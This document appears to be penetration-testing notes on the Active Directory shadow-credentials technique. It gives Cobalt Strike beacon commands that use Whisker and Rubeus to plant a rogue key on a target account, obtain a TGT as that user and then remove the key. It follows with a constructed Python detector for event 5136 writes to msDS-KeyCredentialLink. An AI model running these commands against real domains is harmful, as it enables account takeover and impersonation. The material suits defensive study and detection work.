When an account has shadow credentials configured, a client that holds the matching key can obtain a TGT for that account. In other words, an attacker whose privileges over a target account's DACL are sufficient to add a shadow credential can obtain a TGT as that user.
The attack relies on the Whisker tool (with Rubeus used to request the TGT).
Attack Overview
- Take note of any existing keys on the target account.
- Add a malicious key to the target account.
- Use the key to obtain a TGT.
- Remove only the malicious key from the target after use.
```
# list existing keys
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:[target-account]
# add malicious key (record the base64-encoded certificate, its encryption password, and the deviceid)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /target:[target-account]
# get TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-account] /certificate:[cert-base64] /password:"[cert-password]" /nowrap
# remove the added key (alternatively use `clear` to remove all keys)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:[target-account] /deviceid:[key-deviceid]
```
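From the defender's side, the list/add/use/remove sequence above leaves a write and then a delete on the target's msDS-KeyCredentialLink attribute, which domain controllers record as Security event 5136 when directory-object auditing is enabled. The following detection logic is an added example, not code from the page or from Whisker/Rubeus; the event records, account names ("attacker", "victim", "alice") and domain are constructed, and the field names follow the standard 5136 EventData schema.

```python
"""Flag shadow-credential writes in Windows Security event 5136 records.

Added example, not part of the original page or of Whisker/Rubeus. Assumes
Directory Service Object Modified (5136) auditing is enabled on the DCs and
that events are available as dicts with the standard EventData field names."""
from datetime import datetime, timedelta

KEY_ATTR = "msDS-KeyCredentialLink"   # attribute that stores shadow credentials
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"   # raw 5136 OperationType codes
VICTIM = "CN=victim,CN=Users,DC=corp,DC=local"      # constructed target DN

def ev(time, subject, dn, attr=KEY_ATTR, op=VALUE_ADDED):
    return {"time": time, "SubjectUserName": subject, "ObjectDN": dn,
            "AttributeLDAPDisplayName": attr, "OperationType": op}

# Constructed sample events: the add/use/remove sequence, a legitimate
# self-enrolment (e.g. Windows Hello for Business), and an unrelated write.
EVENTS = [
    ev("2024-05-01T10:00:05", "attacker", VICTIM),
    ev("2024-05-01T10:01:40", "attacker", VICTIM, op=VALUE_DELETED),
    ev("2024-05-01T11:00:00", "alice", "CN=alice,CN=Users,DC=corp,DC=local"),
    ev("2024-05-01T11:05:00", "attacker", VICTIM, attr="description"),
]

def rdn_name(dn):
    """Leading CN value of a distinguished name, lower-cased."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()

def find_shadow_credential_writes(events, window=timedelta(minutes=10)):
    """Alert on msDS-KeyCredentialLink writes by a principal other than the
    account itself; an add undone within `window` is marked short_lived."""
    writes = [e for e in events if e["AttributeLDAPDisplayName"] == KEY_ATTR]
    alerts = []
    for e in writes:
        if rdn_name(e["ObjectDN"]) == e["SubjectUserName"].lower():
            continue  # account writing its own key: normal device registration
        added = e["OperationType"] == VALUE_ADDED
        t0 = datetime.fromisoformat(e["time"])
        short_lived = added and any(
            o["OperationType"] == VALUE_DELETED and o["ObjectDN"] == e["ObjectDN"]
            and timedelta(0) <= datetime.fromisoformat(o["time"]) - t0 <= window
            for o in writes)
        alerts.append({"subject": e["SubjectUserName"], "target": rdn_name(e["ObjectDN"]),
                       "op": "add" if added else "delete", "time": e["time"],
                       "short_lived": short_lived})
    return alerts

if __name__ == "__main__":
    for alert in find_shadow_credential_writes(EVENTS):
        print(alert)
```

In a real pipeline the OperationType codes may already be rendered as "Value Added"/"Value Deleted" by the log forwarder, so match on whichever form your collector emits.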